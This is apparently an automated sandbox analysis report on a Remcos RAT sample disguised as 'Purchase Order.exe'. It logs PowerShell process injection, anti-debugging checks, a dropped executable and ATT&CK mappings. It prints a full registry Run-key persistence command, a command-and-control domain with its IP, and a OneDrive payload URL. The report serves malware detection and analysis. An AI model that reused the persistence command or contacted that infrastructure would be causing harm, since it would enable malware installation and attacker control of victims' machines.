            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6229Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3598Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3664Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe TID: 5380Thread sleep time: -33000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeCode function: 7_2_00406033 FindFirstFileA,FindClose,7_2_00406033
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeCode function: 7_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,7_2_004055D1
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeCode function: 7_2_00402688 FindFirstFileA,7_2_00402688
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\TemplatesJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: Purchase Order.exe, 00000000.00000002.1988217073.0000000000648000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:++
            Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.000000000784A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Purchase Order.exeAPI call chain: ExitProcess graph end nodegraph_0-3274
            Source: C:\Users\user\Desktop\Purchase Order.exeAPI call chain: ExitProcess graph end nodegraph_0-3426
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02C4D6E0 LdrInitializeThunk,2_2_02C4D6E0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe base: 16E0000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe base: 19FFF4Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe "C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "announces" /t reg_expand_sz /d "%compressible% -windowstyle minimized $harmlses=(get-itemproperty -path 'hkcu:\xylograferede94\').karatenes;%compressible% ($harmlses)"
            Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "announces" /t reg_expand_sz /d "%compressible% -windowstyle minimized $harmlses=(get-itemproperty -path 'hkcu:\xylograferede94\').karatenes;%compressible% ($harmlses)"Jump to behavior
            Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managero
            Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managert
            Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078B9000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D51

            Stealing of Sensitive Information

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3203656499.000000000788F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Ultradolichocephaly.exe PID: 6008, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3203656499.000000000788F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Ultradolichocephaly.exe PID: 6008, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		OS Credential Dumping3
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts11
            Command and Scripting Interpreter            		1
            Registry Run Keys / Startup Folder            		1
            Access Token Manipulation            		1
            Software Packing            		LSASS Memory14
            System Information Discovery            		Remote Desktop Protocol1
            Clipboard Data            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            PowerShell            		Logon Script (Windows)112
            Process Injection            		1
            DLL Side-Loading            		Security Account Manager111
            Security Software Discovery            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Registry Run Keys / Startup Folder            		11
            Masquerading            		NTDS2
            Process Discovery            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Modify Registry            		LSA Secrets31
            Virtualization/Sandbox Evasion            		SSHKeylogging213
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
            Virtualization/Sandbox Evasion            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
            Process Injection            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1440304 Sample: Purchase Order.exe Startdate: 13/05/2024 Architecture: WINDOWS Score: 100 36 tochisglobal.ddns.net 2->36 38 web.fe.1drv.com 2->38 40 6 other IPs or domains 2->40 48 Multi AV Scanner detection for domain / URL 2->48 50 Found malware configuration 2->50 52 Antivirus detection for URL or domain 2->52 56 7 other signatures 2->56 10 Purchase Order.exe 3 18 2->10         started        signatures3 54 Uses dynamic DNS services 36->54 process4 file5 32 C:\Users\user\AppData\Local\...pilogic.bac, ASCII 10->32 dropped 62 Suspicious powershell command line found 10->62 14 powershell.exe 20 10->14         started        signatures6 process7 file8 34 C:\Users\user\...\Ultradolichocephaly.exe, PE32 14->34 dropped 64 Obfuscated command line found 14->64 66 Writes to foreign memory regions 14->66 68 Found suspicious powershell code related to unpacking or dynamic code loading 14->68 70 Powershell drops PE file 14->70 18 Ultradolichocephaly.exe 5 14 14->18         started        22 conhost.exe 14->22         started        24 cmd.exe 1 14->24         started        signatures9 process10 dnsIp11 42 tochisglobal.ddns.net 103.253.17.222, 49715, 6426 WIFIKU-AS-IDPTWifikuIndonesiaID unknown 18->42 44 dual-spov-0006.spov-msedge.net 13.107.137.11, 443, 49713 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->44 46 geoplugin.net 178.237.33.50, 49716, 80 ATOM86-ASATOM86NL Netherlands 18->46 58 Antivirus detection for dropped file 18->58 60 Multi AV Scanner detection for dropped file 18->60 26 cmd.exe 1 18->26         started        signatures12 process13 process14 28 conhost.exe 26->28         started        30 reg.exe 1 1 26->30         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Purchase Order.exe8%ReversingLabs
            Purchase Order.exe21%VirustotalBrowse
            Purchase Order.exe100%AviraHEUR/AGEN.1331786

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe100%AviraHEUR/AGEN.1331786
            C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe8%ReversingLabs
            C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe21%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            dual-spov-0006.spov-msedge.net0%VirustotalBrowse
            tochisglobal.ddns.net10%VirustotalBrowse
            geoplugin.net3%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://geoplugin.net/json.gp100%URL Reputationphishing
            http://geoplugin.net/json.gp100%URL Reputationphishing
            http://crl.micro0%URL Reputationsafe
            http://crl.micro0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            http://geoplugin.net/json.gpo0%Avira URL Cloudsafe
            http://geoplugin.net/json.gpl0%Avira URL Cloudsafe
            http://geoplugin.net/0%Avira URL Cloudsafe
            http://geoplugin.net/json.gpN0%Avira URL Cloudsafe
            tochisglobal.ddns.net100%Avira URL Cloudmalware
            http://geoplugin.net/t:0%Avira URL Cloudsafe
            http://geoplugin.net/json.gpW0%Avira URL Cloudsafe
            http://geoplugin.net/json.gpl0%VirustotalBrowse
            http://geoplugin.net/w0%Avira URL Cloudsafe
            http://geoplugin.net/json.gpN0%VirustotalBrowse
            http://geoplugin.net/json.gpo0%VirustotalBrowse
            http://geoplugin.net/3%VirustotalBrowse
            tochisglobal.ddns.net10%VirustotalBrowse
            http://geoplugin.net/json.gpW0%VirustotalBrowse
            http://geoplugin.net/w0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            dual-spov-0006.spov-msedge.net
            		13.107.137.11
            		truefalseunknown
            tochisglobal.ddns.net
            		103.253.17.222
            		truetrueunknown
            geoplugin.net
            		178.237.33.50
            		truefalseunknown
            onedrive.live.com
            		unknown
            		unknownfalse
              		high
              kxwbha.am.files.1drv.com
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://onedrive.live.com/download?resid=7EB674A88CCF381D%21539&authkey=!AJYql7taWUIXlaIfalse
                  		high
                  http://geoplugin.net/json.gptrue
                  • URL Reputation: phishing
                  • URL Reputation: phishing
                  		unknown
                  tochisglobal.ddns.nettrue
                  • 10%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://onedrive.live.com/download?resid=7EB674A88CCF381D%21539&authkey=Ultradolichocephaly.exe, 00000007.00000002.3203656499.000000000784A000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078B9000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3214197333.00000000234E0000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2746622815.0000000004A57000.00000004.00000800.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown
                      http://geoplugin.net/json.gplUltradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2746622815.0000000004A57000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://geoplugin.net/json.gpoUltradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
